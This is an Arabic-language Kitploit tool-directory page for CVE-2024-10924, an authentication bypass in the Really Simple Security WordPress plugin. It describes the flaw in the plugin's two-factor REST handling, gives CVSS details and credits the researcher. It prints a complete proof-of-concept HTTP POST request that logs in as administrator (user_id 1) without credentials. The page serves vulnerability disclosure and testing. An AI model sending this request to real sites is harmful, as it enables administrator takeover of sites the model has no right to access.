Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10924 — Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – تجاوز المصادقة | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-10924
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubrandomrobbiebf/cve-2024-10924

CVE-2024-10924

Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – تجاوز المصادقة

عرض المستودع
41منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-10924: Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – تجاوز المصادقة

الوصف

إضافات Really Simple Security (النسخ المجانية والمحترفة والمحترفة متعددة المواقع) لووردبريس معرضة لتجاوز المصادقة في الإصدارات 9.0.0 إلى 9.1.1.1. السبب هو معالجة غير صحيحة للتحقق من المستخدم في إجراءات REST API للتحقق ذي العاملين باستخدام الدالة check_login_and_get_user. يتيح ذلك للمهاجمين غير الموثقين تسجيل الدخول كأي مستخدم موجود في الموقع، مثل مسؤول، عندما يكون إعداد "المصادقة ذات العاملين" مفعّلاً (معطل افتراضياً).

root@kitploit:~
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE	CVE-2024-10924
CVSS	9.8 (Critical)
Publicly Published	November 14, 2024
Last Updated	November 14, 2024
Researcher	István Márton - Wordfence

POC

root@kitploit:~
POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;
Connection: keep-alive
Content-Length: 90

{
    "user_id":1,
    "login_nonce": "231231231",
    "redirect_to": "/wp-admin/"
}
تنزيل الأداة